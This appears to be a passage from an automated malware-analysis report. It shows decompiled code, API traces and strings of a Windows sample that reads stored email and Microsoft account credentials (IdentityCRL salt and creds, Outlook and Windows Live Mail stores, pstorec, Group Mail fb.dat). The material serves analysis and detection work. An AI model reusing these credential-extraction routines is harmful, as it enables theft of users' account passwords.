                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                        • API String ID: 2884822230-961845771
                                                                        • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                        • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                        • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                        • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}











                                                                        0x0040da04
                                                                        0x0040da2a
                                                                        0x0040da2e
                                                                        0x0040db30
                                                                        0x0040db36
                                                                        0x0040db36
                                                                        0x0040da44
                                                                        0x0040da48
                                                                        0x0040db26
                                                                        0x0040db2a
                                                                        0x00000000
                                                                        0x0040db2a
                                                                        0x0040da67
                                                                        0x0040da6f
                                                                        0x0040da75
                                                                        0x0040da77
                                                                        0x0040da80
                                                                        0x0040da8c
                                                                        0x0040da96
                                                                        0x0040daa0
                                                                        0x0040daa4
                                                                        0x0040dab4
                                                                        0x0040dabb
                                                                        0x0040dabf
                                                                        0x0040daca
                                                                        0x0040dad4
                                                                        0x0040dadd
                                                                        0x0040daf2
                                                                        0x0040db0d
                                                                        0x0040db0d
                                                                        0x0040db16
                                                                        0x0040db16
                                                                        0x0040daca
                                                                        0x0040da8c
                                                                        0x0040db20
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                        • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • memcpy.MSVCRT ref: 0040DADD
                                                                        • memcpy.MSVCRT ref: 0040DAF2
                                                                          • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                          • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                          • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                          • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                        • API String ID: 2768085393-1693574875
                                                                        • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                        • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                        • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                        • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}





















                                                                        0x00411654
                                                                        0x00411656
                                                                        0x0041165b
                                                                        0x00411669
                                                                        0x00411670
                                                                        0x00411691
                                                                        0x00411691
                                                                        0x00411672
                                                                        0x00411675
                                                                        0x0041167d
                                                                        0x00000000
                                                                        0x0041167f
                                                                        0x0041167f
                                                                        0x00411688
                                                                        0x004116a9
                                                                        0x004116ad
                                                                        0x00000000
                                                                        0x004116af
                                                                        0x004116af
                                                                        0x004116b1
                                                                        0x00000000
                                                                        0x004116b1
                                                                        0x0041168a
                                                                        0x0041168f
                                                                        0x00411696
                                                                        0x0041169d
                                                                        0x00000000
                                                                        0x0041169f
                                                                        0x0041169f
                                                                        0x004116a1
                                                                        0x004116b7
                                                                        0x004116b7
                                                                        0x004116b7
                                                                        0x004116ba
                                                                        0x004116ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041168f
                                                                        0x00411688
                                                                        0x0041167d
                                                                        0x004116bd
                                                                        0x004116c2
                                                                        0x004116c9
                                                                        0x004116d0
                                                                        0x004116d7
                                                                        0x004116dd
                                                                        0x004116e3
                                                                        0x004116e5
                                                                        0x004116eb
                                                                        0x004116f1
                                                                        0x004116fa
                                                                        0x004116ff
                                                                        0x00411704
                                                                        0x0041170a
                                                                        0x00411711
                                                                        0x00411717
                                                                        0x00411717
                                                                        0x00411718
                                                                        0x0041171d
                                                                        0x00411722
                                                                        0x00411727
                                                                        0x0041172c
                                                                        0x00411731
                                                                        0x00411750
                                                                        0x00411753
                                                                        0x00411758
                                                                        0x0041175d
                                                                        0x0041176a
                                                                        0x0041176c
                                                                        0x00411772
                                                                        0x004117ae
                                                                        0x004117ae
                                                                        0x004117b1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004117b3
                                                                        0x004117b4
                                                                        0x004117b4
                                                                        0x00411774
                                                                        0x00411774
                                                                        0x00411774
                                                                        0x00411775
                                                                        0x00411778
                                                                        0x0041177a
                                                                        0x00411785
                                                                        0x00411787
                                                                        0x00411787
                                                                        0x00411788
                                                                        0x00411788
                                                                        0x00411785
                                                                        0x0041178b
                                                                        0x0041178b
                                                                        0x0041178f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00411795
                                                                        0x0041179c
                                                                        0x004117a2
                                                                        0x004117a6
                                                                        0x004117bb
                                                                        0x004117a8
                                                                        0x004117a8
                                                                        0x004117a8
                                                                        0x004117c3
                                                                        0x004117c8
                                                                        0x004117ca
                                                                        0x004117d0
                                                                        0x004117d3
                                                                        0x004117d3
                                                                        0x004117d9
                                                                        0x0041180e
                                                                        0x00411819

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                        • String ID:
                                                                        • API String ID: 3662548030-0
                                                                        • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                        • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                        • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                        • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                        0x00410d1b
                                                                        0x00410d37
                                                                        0x00410d3c
                                                                        0x00410d49
                                                                        0x00410d4a
                                                                        0x00410d4e
                                                                        0x00410d55
                                                                        0x00410d5f
                                                                        0x00410d64
                                                                        0x00410d6d
                                                                        0x00410d72
                                                                        0x00410d7b
                                                                        0x00410d7c
                                                                        0x00410d86
                                                                        0x00410d92
                                                                        0x00410da2
                                                                        0x00410daa
                                                                        0x00410dbd
                                                                        0x00410dc5
                                                                        0x00410de5
                                                                        0x00410dea
                                                                        0x00410dfe
                                                                        0x00410e0c
                                                                        0x00410e14
                                                                        0x00410e16
                                                                        0x00410e20
                                                                        0x00410e22
                                                                        0x00410e22
                                                                        0x00410e20
                                                                        0x00410e2c
                                                                        0x00410e2d
                                                                        0x00410e31
                                                                        0x00410e32
                                                                        0x00410e37
                                                                        0x00410e3b
                                                                        0x00410e48
                                                                        0x00410e48
                                                                        0x00410e53

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00410D3C
                                                                          • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                          • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                          • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                          • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                          • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                          • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                        • memset.MSVCRT ref: 00410DAA
                                                                        • memset.MSVCRT ref: 00410DC5
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                        • strlen.MSVCRT ref: 00410E0C
                                                                        • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                        Strings
                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                        • Store Root, xrefs: 00410DD6
                                                                        • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                        • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                        • API String ID: 4071991895-2578778931
                                                                        • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                        • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                        • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                        • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t13;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1; // executed
					_t13 =  *_t11( &_v12); // executed
					_t15 = _t13;
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}











                                                                        0x00404844
                                                                        0x0040484b
                                                                        0x00404852
                                                                        0x00404854
                                                                        0x0040485c
                                                                        0x00404860
                                                                        0x0040488a
                                                                        0x0040488a
                                                                        0x00404892
                                                                        0x00404893
                                                                        0x00404898
                                                                        0x004048b5
                                                                        0x0040489a
                                                                        0x004048a7
                                                                        0x004048b0
                                                                        0x004048b0
                                                                        0x00404898
                                                                        0x00404868
                                                                        0x00404870
                                                                        0x00404876
                                                                        0x00404877
                                                                        0x00404879
                                                                        0x00404879
                                                                        0x0040487c
                                                                        0x00404884
                                                                        0x00000000
                                                                        0x00404886
                                                                        0x00404886
                                                                        0x00000000
                                                                        0x00404886

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                        • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040488A
                                                                        • MessageBoxA.USER32 ref: 004048A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 2780580303-317687271
                                                                        • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                        • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                        • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                        • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}






















                                                                        0x004037b1
                                                                        0x004037b1
                                                                        0x004037cc
                                                                        0x004037d2
                                                                        0x004037e0
                                                                        0x004037e6
                                                                        0x004037fc
                                                                        0x00403803
                                                                        0x004038cc
                                                                        0x004038cc
                                                                        0x00403810
                                                                        0x0040381b
                                                                        0x0040381e
                                                                        0x00403825
                                                                        0x00403831
                                                                        0x00403837
                                                                        0x00403841
                                                                        0x0040384b
                                                                        0x0040385d
                                                                        0x00403868
                                                                        0x00403869
                                                                        0x00403889
                                                                        0x0040389e
                                                                        0x004038a3
                                                                        0x0040386b
                                                                        0x00403872
                                                                        0x00403879
                                                                        0x00403879
                                                                        0x004038b4
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 004037D2
                                                                        • memset.MSVCRT ref: 004037E6
                                                                          • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                          • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        • strchr.MSVCRT ref: 00403855
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                        • strlen.MSVCRT ref: 0040387E
                                                                        • sprintf.MSVCRT ref: 0040389E
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                        • String ID: %s@yahoo.com
                                                                        • API String ID: 1649821605-3288273942
                                                                        • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                        • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                        • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                        • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                        0x004034cb
                                                                        0x004034e4
                                                                        0x004034eb
                                                                        0x004034fa
                                                                        0x00403501
                                                                        0x00403521
                                                                        0x0040352b
                                                                        0x0040353c
                                                                        0x00403541
                                                                        0x00403547
                                                                        0x00403554
                                                                        0x00000000
                                                                        0x00403566
                                                                        0x00403569

                                                                        APIs
                                                                        • memset.MSVCRT ref: 004034EB
                                                                        • memset.MSVCRT ref: 00403501
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                          • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                          • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                        • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrcat$Closestrcpystrlen
                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                        • API String ID: 1387626053-966475738
                                                                        • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                        • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                        • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                        • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
